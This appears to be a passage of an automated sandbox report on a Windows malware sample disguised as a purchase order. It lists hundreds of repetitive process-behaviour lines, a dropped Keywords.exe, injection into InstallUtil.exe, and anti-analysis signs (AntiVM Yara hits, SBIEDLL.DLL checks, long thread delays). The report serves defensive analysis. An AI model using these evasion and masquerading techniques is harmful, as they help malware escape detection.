Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Memory allocated: 4E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 50A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Memory allocated: 1830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Memory allocated: 3330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
